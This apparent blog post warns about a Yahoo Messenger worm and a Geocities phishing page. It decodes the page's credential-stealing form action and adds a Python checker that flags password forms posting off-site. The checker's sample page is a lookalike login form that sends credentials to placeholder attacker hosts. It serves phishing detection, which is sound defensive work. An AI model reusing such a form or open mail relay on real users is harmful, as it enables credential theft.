Be careful of Yahoo IM virus
If you’re using Yahoo Instant Messenger, beware of strange messages from friends or strangers. There are a couple of malicious things floating around that may trouble you.
The first is a worm that sends a message containing a malicious URL. Clicking the URL takes you to a page that installs a custom web browser without permission, dropping an IE-like icon on the desktop. The start page is also changed to point to a page with more malware, which loads whenever this custom browser is launched, and strange music plays on computer startup. The worm then attempts to propagate itself further in Yahoo chat.
However, there’s also a social engineering “virus” (if you can call it that) going around, which works much more simply. You may get a message from someone on your buddy list telling you to check out a site, with a URL pointing to a Geocities page. I recently got one of these messages, so I could dive into it in more detail.
This is brilliant for its simplicity. The page itself looks just like a standard Yahoo login. However, it’s not. Someone hosted a page on Geocities, emulating the Yahoo style, but with a different form action. The brilliance here is that there is no virus. It relies entirely on people’s trust in the Yahoo brand and their familiarity with logging into Yahoo. Even looking at the domain isn’t straightforward, because Yahoo owns Geocities. People who use this form are sending their username and password off to some third party. Let’s see if we can get any clues as to how it works.
The form action was encoded using HTML escape sequences, but when decoded it points to http://www2.fiberbit.net/form/mailto.cgi. Oops, looks like someone left a poorly coded script out there! Word to budding coders out there: if you write an email posting script, make sure not to allow arbitrary setting of the destination address — it’s just asking for abuse.
The hidden attributes of this form are as follows:
So, by all appearances, submitting this form sends your Yahoo username and password to the address icewishart@gmail.com. Whoever receives them can then log in as you and send the same message to people on your Yahoo buddy list, to harvest more usernames and passwords. Better change your Yahoo password if you’ve fallen for this!
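The checks above (decode the escaped form action, compare its host with the page’s host, look at the hidden fields) can be automated. The following added example, which is not code from the post, does that with the Python standard library against a constructed lookalike page; the hosts, addresses and page URL are placeholders rather than the real Geocities page or the real script.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page (not the real Geocities page): a lookalike login
# form whose action is written with HTML character references, as in the
# post, and whose hidden fields carry the destination address. Hosts and
# addresses are placeholders.
SAMPLE_PAGE = """
<html><body>
<form method="post"
      action="&#104;&#116;&#116;&#112;&#58;&#47;&#47;mailer.example.invalid/form/mailto.cgi">
  <input type="hidden" name="recipient" value="attacker@example.invalid">
  <input type="hidden" name="subject" value="yahoo login">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""

# Assumed URL of the page the form was found on (placeholder host).
SAMPLE_PAGE_URL = "http://geocities.example.invalid/lookalike/login.html"


class FormCollector(HTMLParser):
    """Collect every <form> on the page with its action and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # HTMLParser already decodes character references in attribute
            # values; html.unescape is applied again so a double-encoded
            # action still comes out as a plain URL.
            self._current = {
                "action": html.unescape(attrs.get("action") or ""),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (attrs.get("type") or "text").lower(),
                "name": attrs.get("name") or "",
                "value": attrs.get("value") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_forms(page_html, page_url):
    """Describe each form: where it posts, whether it carries a password
    field, and whether any hidden field smuggles an e-mail address."""
    collector = FormCollector()
    collector.feed(page_html)
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for form in collector.forms:
        action_url = urljoin(page_url, form["action"])
        action_host = (urlsplit(action_url).hostname or "").lower()
        hidden = {i["name"]: i["value"]
                  for i in form["inputs"] if i["type"] == "hidden"}
        findings.append({
            "action": action_url,
            "off_site": action_host != page_host,
            "has_password": any(i["type"] == "password" for i in form["inputs"]),
            "hidden_addresses": {k: v for k, v in hidden.items() if "@" in v},
        })
    return findings


def is_credential_phish(finding):
    """A form that posts a password field to a different host than the page
    it lives on is the pattern the post describes."""
    return finding["has_password"] and finding["off_site"]


if __name__ == "__main__":
    for f in analyze_forms(SAMPLE_PAGE, SAMPLE_PAGE_URL):
        print(f"action={f['action']} off_site={f['off_site']} "
              f"password={f['has_password']} hidden={f['hidden_addresses']} "
              f"phish={is_credential_phish(f)}")
```

The host comparison is deliberately simple: it flags any cross-host post of a password field, which is the cheapest signal a user or a proxy can check, and the hidden-field scan surfaces the recipient address that gives the scheme away.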
While the first vulnerability is a legitimate and critical one, the second underscores the importance of being careful about where you provide your information online. There’s a reason banks have started using two-factor security — they want you to be very aware of where you provide your credentials. When online, adopt an attitude of paranoia. You never know who is really sending you that message.